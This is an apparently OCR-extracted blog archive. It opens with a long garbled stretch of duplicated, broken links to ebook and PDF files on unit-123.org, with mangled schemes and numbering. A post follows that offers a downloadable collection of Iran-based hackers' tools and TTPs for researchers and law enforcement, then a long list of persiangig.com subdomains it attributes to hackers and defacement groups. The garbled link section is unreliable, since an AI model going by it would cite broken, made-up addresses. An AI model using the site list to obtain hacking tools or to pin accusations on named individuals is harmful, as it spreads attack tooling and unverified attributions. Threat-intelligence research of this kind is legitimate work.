. https://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_07_removed{20-%20Unknown. 


://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_08_removed/20-%20Unknown . 


://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_04_removed{%20-%,20Unknown. 
://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_08_removed{%20-%,20Unknown. 


://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_04_removed{%20-%20Unknown. 
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23. 
24. 
25. 
26. 
27. 
28. 
29. 
30. 
31. 
32. 
33. 
34. 
35. 
36. 
37. 
38. 
39. 
40. 
41. 
42. 
43. 
44. 
45. 
46. 
47. 
48. 
49. 
50. 
51. 
52. 
53. 
54. 
5D: 
56. 
57. 
58. 
59. 
60. 
61. 
62. 
63. 
64. 
65. 
66. 
67. 
68. 
69. 
70. 
71. 
72. 


ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_08_removed/,20-%20Unknown . 


ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_04_removed/20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_08_removed/20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog _02_removed/20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_02_removed/,20-7%20Unknown. 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_02_removed/,20-%20Unknown . 


ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_04_removed.epub 


ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog _04_removed/20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_07_removed/,20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_05_removed/,20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_05_removed/,20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_05_removed/20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_03_removed/,20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_05_removed/,20-%20Unknown. 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_ 08_removed/20-%20Unknown . 
://anit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_03_removed{20-%20Unknown. 
://anit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_02_removed{20-%20Unknown. 
://anit-123.org/wp- content/uploads/2020/08/Dancho_Danchev_Blog_13_removed{20-%20Unknown. 
://anit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_13_removed{20-%20Unknown. 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_13_removed/20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_13_removed/20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog 02_removed/,20-%20Unknown . 
://anit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_03_removed{20-%20Unknown. 
://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_02_removed/,20-7%20Unknown. 
://anit-123.org/wp- content/uploads/2020/08/Dancho_Danchev_Blog_04_removed{20-%20Unknown. 
://anit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_07_removed{20-%20Unknown. 
://anit-123.org/wp- content/uploads/2020/08/Dancho_Danchev_Blog_06_removed{20-%20Unknown. 
://anit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_06_removed{20-%20Unknown. 
://anit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_06_removed{20-%20Unknown. 
://anit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_07_removed{20-%20Unknown. 
://anit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_04_removed{20-%,20Unknown. 


ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_13_removed/,20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_05_removed/,20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_05_removed/,20-7%20Unknown. 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_06_removed/,20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_01_removed/,20-%20Unknown . 
ttps://unit-123. org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_13_removed/20-%20Unknown . 
ttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_06_removed/,20-%20Unknown . 

://anit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_13_removed{20-%20Unknown. 

://anit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_01_removed{20-%20Unknown. 

://anit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_06_removed{20-%20Unknown. 
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://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_01_removed{%20-%20Unknown. 
://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_03_removed{20-%20Unknown. 
://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_07_removed{20-%20Unknown. 
://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_02_removed{%20-%20Unknown. 
://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_04_removed{%20-%20Unknown. 
://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_01_removed{%20-%20Unknown. 
://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_01_removed{20-%20Unknown. 
://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_09_removed/20-%20Unknown. 
://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_10_removed{%20-%,20Unknown. 
://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_01_removed{%20-%20Unknown. 
://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_01_removed/20-%20Unknown. 
://aunit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_11_removed/%20-%20Unknown. 
://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_01_removed{%20-%20Unknown. 
://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_01_removed{%20-%20Unknown. 
://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_09_removed/20-%,20Unknown. 
://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_09_removed/20-%20Unknown. 
://aunit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_13_removed/%20-%20Unknown. 
://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_09_removed{%20-%20Unknown. 
://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_10_removed{%20-%20Unknown. 
://aunit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_10_removed/20-%20Unknown. 
://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_10_removed/%20-%20Unknown. 


94. https://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_09_removed.epub 


. bttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_09_removed/%20-%20Unknown. 
96 

. bttps://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_05_removed/420-%,20Unknown. 

. hbttps://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_01_removed{%20-%20Unknown. 
99, 
100. https: //unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog 10_removed%20-%20Unknown. 
101. https: //unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog 11_removed/%20-%20Unknown. 
102. https: //unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog 11_removed%20-%20Unknown. 
103. https: //unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog 11_removed%20-%20Unknown. 
104, 
105. https: //unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog 11_removed%20-%20Unknown. 
106. https: //unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog 06_removed%20-%20Unknown. 


107. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_removed%20-%20Unknown. rb 

108. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_10_removed{20-%20Unknown. 
109. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_09_removed/20-%20Unknown. 
110. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_11_removed{20-%20Unknown. 
111. ://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_removed/20-%20Unknown. fb2 
112. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_09_removed{20-%20Unknown. 
113. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_10_removed{20-%20Unknown. 
114. ://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog 12 removed%20-%20Unknown. 
115. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_09_removed{20-%20Unknown. 
116. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_10_removed{20-%20Unknown. 
117. ://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog 11_removed%20-%20Unknown. 


118. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_removed/420-%20Unknown. snb 
119. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_11_removed/20-%20Unknown. snb 
120. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_12_removed{20-%,20Unknown . azw3 
121. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_removed%20-%20Unknown. azw 
122. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_12_removed{20-%20Unknown. mobi 
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123. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_removed%/,20-%20Unknown . pm1. 


124. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_03_removed/20-%,20Unknown. txt 
125. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_02_removed/20-%,20Unknown. txt 
126. ://aunit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_removed/,20-%20Unknown .mobi 

127. ://aunit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_12_removed{%20-%,20Unknown. lit 


128. https: //unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_04_removed/,20-%20Unknown. txt 
129, 

130. https: //unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_12_removed/20-%20Unknown.txtz 
131. https: //unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_removed%20-%20Unknown .1rf 
132. https: //unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_removed%20-%20Unknown .1lit 
133. https: //unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_12_removed/,20-%20Unknown.1rf 


134. https: //unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_removed.epub 


135. https: //unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_removed%20-%20Unknown .txt 


136. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_03_removed/%20-%20Unknown.tc 
137. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_removed/,20-%20Unknown . txtz 
138. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_13_removed{20-%20Unknown. 
139. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_02_removed{%20-%20Unknown. 
140. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_04_removed{%20-%,20Unknown. 
141. ://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_05_removed%20-%,20Unknown. 
142. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_01_removed{20-%20Unknown. 
143. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_10_removed{20-%20Unknown. 
144. ://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_09_removed%20-%,20Unknown. 
145. ://aunit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_removed/,20-%20Unknown.tc 
146. ://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_12_removed{420-%20Unknown.rb 
147. ://unit-123.org/wp-content/uploads/2020/08/Dancho_Danchev_Blog_removed%20-%20Unknown. pdb 
148. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_11_removed{%20-%20Unknown. 
149. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_12_removed{/20-%20Unknown. 
150. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_05_removed/%20-%,20Unknown. 
151. ://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_07_removed{20-%20Unknown. 
152. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_13_removed{20-%20Unknown. 
153. ://aunit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_08_removed{20-%,20Unknown. 
154. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_01_removed%20-%,20Unknown. 
155. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_07_removed{/20-%20Unknown. 
156. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_06_removed{20-%20Unknown. 
157. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_12_removed{%20-%,20Unknown. 
158. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_08_removed/%20-%,20Unknown. 
159. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_06_removed{20-%20Unknown. 
160. ://unit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_12_removed{/20-%20Unknown. 
161. ://anit-123.org/wp- content /uploads/2020/08/Dancho_Danchev_Blog_12_removed{20-%20Unknown. 
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16.8 October 


16.8.1 Exposing Iran-based Hackers and Web Site Defacement Group’s Personal 
Web Sites Portfolio - Direct Technical Collection Download! Grab a Copy To- 
day! (2020-10-29 15:03) 


[1] 


Dear blog readers, 


Following my recently released second edition "[2]A Qualitative and Technical Collection 
OSINT-Enriched Analysis of the Iranian Hacking Scene Through the Prism of the Infamous 
Ashiyane Digital Security Team - [PDF] - Direct Download - Report" which is the second 
edition of my original "[3]Exposing Ashiyane Digital Security Team - Report and Social 
Network Analysis Graph - [PDF] + Maltego Graph" research report released in 2015 I’ve 
decided to make publicly accessible a diverse portfolio of TTPs (Tactics Techniques and 
Procedures) that also includes hacking tools and tools of the trade belonging to Iran-based 
hackers and Web Site Defacement Groups with the idea to empower the security industry and 
U.S Law Enforcement on its way to track down and shut down these personal Web site 
communities and personal hacking tools and tools of the trade Web site repositories. 


- Part 01 - [4]Direct Technical Collection Download (2.5GB) 
- Part 02 - [5]Direct Technical Collection Download 


Sample portfolio of currently active Iran-based hackers and Web site defacement group’s 
personal web sites obtained using Technical Collection: 


https://black-shadow.persiangig.com/ 
https://javananclub.persiangig.com/ 
https://mohsen3800.persiangig.com/ 
https://adamforush.persiangig.com/ 
https://arvineasthackers.persiangig.com/ 
https://yaban3.persiangig.com/ 
https://soa-team.persiangig.com/ 
https://bulurp.persiangig.com/ 
https://temp-designer.persiangig.com/ 
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https://s3curity.persiangig.com/ 
https://manimaxi.persiangig.com/ 
https://gorosneh.persiangig.com/ 
https://samiruk.persiangig.com/ 
https://eximor.persiangig.com/ 
https://darkunder.persiangig.com/ 
https://matin-teror.persiangig.com/ 
https://ratohOst. persiangig.com/ 
https://behzadmesri.persiangig.com/ 
https://mohamm3d.persiangig.com/ 
https://r3d-error.persiangig.com/ 
https://m4hd1.persiangig.com/ 
https://anti-network.net/ 
https://pythonr00t.persiangig.com/ 
https://invisible.persiangig.com/ 
https://alb2a3j4m5.persiangig.com/ 
https://medrik1.persiangig.com/ 
https://h4ckerr.persiangig.com/ 
https://essaji.persiangig.com/ 
https://h3x73l.persiangig.com/ 
https://b-i-o-s.persiangig.com/ 
https://d4rvi5hi.persiangig.com/ 
https://sasukeakastuki.persiangig.com/ 
https://dwast.persiangig.com/ 
https://keent. persiangig.com/ 
https://cr4zylov3r.persiangig.com/ 
https://the-rock.persiangig.com/ 
https://pejv4k.persiangig.com/ 
https://sunboy871.persiangig.com/ 
https://nam3chi.persiangig.com/ 
https://s-w-a-t.persiangig.com/ 
https://cr4ck3r.persiangig.com/ 
https://mohammad-ice.persiangig.com/ 
https://hosinn.persiangig.com/ 


https://nazanin.persiangig.com/ 
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https://jenik2.persiangig.com/ 
https://sar4tan.persiangig.com/ 
https://oahman666.persiangig.com/ 
https://farbodmahini.persiangig.com/ 
https://blackcap.persiangig.com/ 
https://behfaraz.persiangig.com/ 
https://ehsan-empire.persiangig.com/ 
https://afshinl11.persiangig.com/ 
https://darkhastdotnet2.persiangig.com/ 
https://cyberdevilz.persiangig.com/ 
https://redoc.persiangig.com/ 
https://diagramm.persiangig.com/ 
https://amarok.persiangig.com/ 
https://brainbOy.persiangig.com/ 
https://tir3x-r00t.persiangig.com/ 
https://samirdotnet.persiangig.com/ 
https://hdnsoft.persiangig.com/ 
https://arianismmm.persiangig.com/ 
https://arefmaramazi.persiangig.com/ 
https://kabooos.persiangig.com/ 
https://maarek.persiangig.com/ 
https://sysn3t.persiangig.com/ 
https://badjen3.persiangig.com/ 
https://mr-bami.persiangig.com/ 
https://datawar.persiangig.com/ 
https://hkhmerikhi.persiangig.com/ 
https://iraniancyber.persiangig.com/ 
https://tink3r.persiangig.com/ 
https://vahid4251.persiangig.com/ 
https://satanicstar.persiangig.com/ 
https://dangerous-hacker.persiangig.com/ 
https://ettefaghi.persiangig.com/ 
https://blackfox.persiangig.com/ 
https://amirsalartavakoli.persiangig.com/ 
https://datacoders.persiangig.com/ 
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https://vvanted.persiangig.com/ 
https://bia2takmusic.persiangig.com/ 
https://esoft. persiangig.com/ 
https://scriptplazza.persiangig.com/ 
https://alijojo.persiangig.com/ 
https://akams.persiangig.com/ 
https://mssql.persiangig.com/ 
https://farbodezrael.persiangig.com/ 
https://msu-amozesh.persiangig.com/ 
https://immortal-boy.persiangig.com/ 
https://saeedgraph.persiangig.com/ 
https://msu360.persiangig.com/ 
https://d3f4c3r.persiangig.com/ 
https://d4wood.persiangig.com/ 
https://aminsheikha.persiangig.com/ 
https://motakhases.ir/ 
https://encOd3r.persiangig.com/ 
https://avadakedavra.persiangig.com/ 
https://neo-the-funny.persiangig.com/ 
https://karaji21.persiangig.com/ 
https://blackportal.persiangig.com/ 
https://natars.persiangig.com/ 
https://ravager.persiangig.com/ 
https://n4bil.persiangig.com/ 
https://siamak17.persiangig.com/ 
https://evilshadow.persiangig.com/ 
https://lalecarbon.persiangig.com/ 
https://iran-pix.persiangig.com/ 
https://quarenix.persiangig.com/ 
https://movaffag.persiangig.com/ 
https://skOnter.persiangig.com/ 
https://devilzcOder.persiangig.com/ 
https://security-team.persiangig.com/ 
https://kish110.persiangig.com/ 


https://boromir.persiangig.com/ 


8673 


https://timer.persiangig.com/ 
https://ali0123.persiangig.com/ 
https://ezami.persiangig.com/ 
https://r0zi33h.persiangig.com/ 
https://anonyr3z4.persiangig.com/ 
https://matin0O21.persiangig.com/ 
https://terminatorl.persiangig.com/ 
https://ibhteam.persiangig.com/ 
https://sianOr.persiangig.com/ 
https://mohammadvaker.persiangig.com/ 
https://engineer-sniper.persiangig.com/ 
https://aware.persiangig.com/ 
https://samadzade.persiangig.com/ 
https://namedhaker.persiangig.com/ 
https://catcOnfig.persiangig.com/ 
https://mr-4nonymous.persiangig.com/ 
https://tarfandrooz.persiangig.com/ 
https://wanted1.persiangig.com/ 
https://dangerman.persiangig.com/ 
https://hivateam.persiangig.com/ 
https://afsaran-agrab.persiangig.com/ 
https://sootak.persiangig.com/ 
https://anzalichi.persiangig.com/ 
https://maxpayne.persiangig.com/ 
https://virus45.persiangig.com/ 
https://md-r00t.persiangig.com/ 
https://h4med.persiangig.com/ 
https://darkcoder.persiangig.com/ 
https://bia2saadi.persiangig.com/ 
https://p35download.persiangig.com/ 
https://jshacker.persiangig.com/ 
https://srm-kabir.persiangig.com/ 
https://cenator-vb.persiangig.com/ 
https://karim-psp.persiangig.com/ 
https://ahwazdownload.persiangig.com/ 
8674 


https://drwxrwxrwx.persiangig.com/ 
https://mahdi45.persiangig.com/ 
https://injenious.persiangig.com/ 
https://mrdecoder.persiangig.com/ 
https://masuod-shift.persiangig.com/ 
https://rking.persiangig.com/ 
https://onlineteach.persiangig.com/ 
https://anatema.persiangig.com/ 
https://impossibles.persiangig.com/ 
https://lordbooter.persiangig.com/ 
https://wantedst.persiangig.com/ 
https://diedloves.persiangig.com/ 
https://boxochi.persiangig.com/ 
https://I2odon.persiangig.com/ 
https://lordnitro. persiangig.com/ 
https://thr3at.persiangig.com/ 
https://masoud-70.persiangig.com/ 
https://androidpoor.persiangig.com/ 
https://bimbim.persiangig.com/ 
https://shahinfalcon.persiangig.com/ 
https://java-mesh.persiangig.com/ 
https://anax2x.persiangig.com/ 
https://ario-barzan.persiangig.com/ 
https://arman98.persiangig.com/ 
https://queen-iran.persiangig.com/ 
https://lourenzo.persiangig.com/ 
https://vhdmsm.persiangig.com/ 
https://mr-parsi.persiangig.com/ 
https://persian-defacer.persiangig.com/ 
https://alipcl.persiangig.com/ 
https://erfanx2x.persiangig.com/ 
https://error-back-x9.persiangig.com/ 
https://drmaster.persiangig.com/ 
https://fulltarh. persiangig.com/ 
https://pantagon.persiangig.com/ 


8675 


https://mamd00.persiangig.com/ 
https://hiacker.persiangig.com/ 
https://m3hl2ad.persiangig.com/ 
https://gta5edit. persiangig.com/ 
https://powerdeactiver.persiangig.com/ 
https://ninja-armin.persiangig.com/ 
https://jimunix.persiangig.com/ 
https://k4zem.persiangig.com/ 
https://nobOdy.persiangig.com/ 
https://mrnavid.persiangig.com/ 
https://hares.persiangig.com/ 
https://khan2.persiangig.com/ 
https://liplipok.persiangig.com/ 
https://omM98511.persiangig.com/ 
https://nofacenoname.persiangig.com/ 
https://medl01.persiangig.com/ 
https://infoweb.persiangig.com/ 
https://encoder.persiangig.com/ 
https://optishock.persiangig.com/ 
https://prOgrammers.persiangig.com/ 
https://deface.persiangig.com/ 
https://apexpredator.persiangig.com/ 
https://mr-pass.persiangig.com/ 
https://amir-666.persiangig.com/ 
https://iranmoon.persiangig.com/ 
https://kingdeface.persiangig.com/ 
https://mahabad1.persiangig.com/ 
https://trOyt34m.persiangig.com/ 
https://alOn3-m4n.persiangig.com/ 
https://kingback.persiangig.com/ 
https://codez.persiangig.com/ 
https://noter.persiangig.com/ 
https://spyn3t.persiangig.com/ 
https://kh-co.persiangig.com/ 
https://syndrOme.persiangig.com/ 
8676 


https://golpaboyz.persiangig.com/ 
https://jatropat.persiangig.com/ 
https://mehdy007.persiangig.com/ 
https://titaniom1370.persiangig.com/ 
https://ehsanmae.persiangig.com/ 


https://hackreza.persiangig.com/ 


https://esfahan-security.persiangig.com/ 


https://alireza5800.persiangig.com/ 
https://yazdanx7.persiangig.com/ 
https://a-3is.persiangig.com/ 
https://fobiyght76.persiangig.com/ 
https://litoe.persiangig.com/ 
https://atrix.persiangig.com/ 
https://kovalak.persiangig.com/ 
https://rebell.persiangig.com/ 
https://titaksecteam.persiangig.com/ 
https://bigb4ng.persiangig.com/ 
https://cyberboys.persiangig.com/ 
https://wolf1208.persiangig.com/ 
https://mjbarbod.persiangig.com/ 
https://hashor.persiangig.com/ 
https://papet.persiangig.com/ 
https://hushy.persiangig.com/ 
https://saeed-00x.persiangig.com/ 
https://zabOn.persiangig.com/ 
https://a74462.persiangig.com/ 
https://abbas-virus.persiangig.com/ 
https://abdrezaha.persiangig.com/ 
https://afeel.persiangig.com/ 
https://afgar753.persiangig.com/ 
https://afr-computer.persiangig.com/ 
https://agh45.persiangig.com/ 
https://albert.persiangig.com/ 
https://ali-danger.persiangig.com/ 
https://ali486.persiangig.com/ 


8677 


https://aliclop.persiangig.com/ 
https://alierrorl.persiangig.com/ 
https://alirezabiyal.persiangig.com/ 
https://alirezashiri.persiangig.com/ 
https://alirezaxxl.persiangig.com/ 
https://alisoft. persiangig.com/ 
https://alvlin.persiangig.com/ 
https://am-tools.persiangig.com/ 
https://amin77.persiangig.com/ 
https://amir-pw.persiangig.com/ 
https://amir23.persiangig.com/ 
https://amirhossein021.persiangig.com/ 
https://amirjustfriend.persiangig.com/ 
https://amirmansoury.persiangig.com/ 
https://amolhackers.persiangig.com/ 
https://anti-network.persiangig.com/ 
https://antichat. persiangig.com/ 
https://www.antifilterby4ull-hacker.ht/ 
https://applexxe.persiangig.com/ 
https://aragh.persiangig.com/ 
https://arazdownloadpg.persiangig.com/ 
https://aria-security.persiangig.com/ 
https://armaninvisible.persiangig.com/ 
https://armingame.persiangig.com/ 
https://armintanha.persiangig.com/ 
https://artenis.persiangig.com/ 
https://ashitor.persiangig.com/ 
https://ashkanan3.persiangig.com/ 
https://asm952.persiangig.com/ 
https://attack. persiangig.com/ 
https://b3ylux3.persiangig.com/ 
https://bachebahal.persiangig.com/ 
https://bamiran.persiangig.com/ 
https://bardiajoon.persiangig.com/ 
https://barnamehnevesy.persiangig.com/ 
8678 


https://beat20.persiangig.com/ 
https://best-gold.persiangig.com/ 
https://bestbset.persiangig.com/ 
https://bia2bestfile.persiangig.com/ 
https://bia2music2.persiangig.com/ 
https://big-killer.persiangig.com/ 
https://bijism.persiangig.com/ 


https://biologystudentshirazu.persiangig.com/ 


https://blackdata.persiangig.com/ 
https://blackh4t.persiangig.com/ 
https://blacklast.persiangig.com/ 


https://blackwizardmagician.persiangig.com/ 


https://blogskin.persiangig.com/ 
https://bo00000ote.persiangig.com/ 
https://cOderl.persiangig.com/ 
https://ceh2010.persiangig.com/ 
https://chater.persiangig.com/ 
https://ciph3r.persiangig.com/ 
https://civilz.persiangig.com/ 
https://coldfire.persiangig.com/ 
https://coldn.persiangig.com/ 
https://comonism.persiangig.com/ 
https://computer-lab2.persiangig.com/ 
https://cover-weblog.persiangig.com/ 
https://craft.persiangig.com/ 
https://crim3r.persiangig.com/ 
https://csundragon.persiangig.com/ 
https://cybersaboteur.persiangig.com/ 
https://d3structlv3.persiangig.com/ 
https://dad4mahan.persiangig.com/ 
https://daimon74.persiangig.com/ 
https://darkhastdotnet.persiangig.com/ 
https://darknessxxl.persiangig.com/ 
https://darkwitch.persiangig.com/ 


https://datairan.persiangig.com/ 


8679 


https://defaced.persiangig.com/ 
https://delsa.persiangig.com/ 
https://delta-hacker.persiangig.com/ 
https://destroyerh3ll.persiangig.com/ 
https://dialup-download.persiangig.com/ 
https://diazpame10.persiangig.com/ 
https://dl1-security-network.persiangig.com/ 
https://dl4-downloadfa.persiangig.com/ 
https://dorsaazari.persiangig.com/ 
https://dostetdarammaa.persiangig.com/ 
https://dotaallstars.persiangig.com/ 
https://downloadestan5.persiangig.com/ 
https://dr-h4ck3r.persiangig.com/ 
https://dr-root.persiangig.com/ 
https://drduger.persiangig.com/ 
https://e3mail.persiangig.com/ 
https://ehsan6206.persiangig.com/ 
https://ekrami01.persiangig.com/ 
https://ekrami10.persiangig.com/ 
https://ekrami3.persiangig.com/ 
https://elyarz.persiangig.com/ 
https://erfxn.persiangig.com/ 
https://eshraq.persiangig.com/ 
https://esmaeilpoor.persiangig.com/ 
https://esmailapps.persiangig.com/ 
https://esshop.persiangig.com/ 
https://far30tools.persiangig.com/ 
https://faraz4u.persiangig.com/ 
https://farhad242.persiangig.com/ 
https://faridmafia.persiangig.com/ 
https://fatalking.persiangig.com/ 
https://fazel-fbi.persiangig.com/ 
https://fazilamiry. persiangig.com/ 
https://fcbwin.persiangig.com/ 
https://fdownloadir.persiangig.com/ 
8680 


https://fghjjh.persiangig.com/ 
https://firebaxe.persiangig.com/ 
https://freelogo.persiangig.com/ 
https://frees.persiangig.com/ 
https://fun4ir.persiangig.com/ 
https://gOld-soft.persiangig.com/ 
https://g3n3rall-blackhat.persiangig.com/ 
https://galar2.persiangig.com/ 
https://galebsaz.persiangig.com/ 
https://game22009.persiangig.com/ 
https://gha3dak.persiangig.com/ 
https://ghalebkade.persiangig.com/ 
https://ghased2006.persiangig.com/ 
https://ghayegh-khali.persiangig.com/ 
https://gigmohsen.persiangig.com/ 
https://gikgik.persiangig.com/ 
https://gold-sOft. persiangig.com/ 
https://gold33.persiangig.com/ 
https://goord.persiangig.com/ 
https://groupsyahoo.persiangig.com/ 
https://gtaimages.persiangig.com/ 
https://h-team.persiangig.com/ 
https://h3xbOyz.persiangig.com/ 
https://h4ck-tools.persiangig.com/ 
https://hacker.persiangig.com/ 
https://hackeran99.persiangig.com/ 
https://hackerashiyane.blogfa.com/ 
https://hadihadi.persiangig.com/ 
https://haftevigarl.persiangig.com/ 
https://hakaki.persiangig.com/ 
https://hakha.persiangig.com/ 
https://hali3eyyedh.persiangig.com/ 
https://naman313.persiangig.com/ 
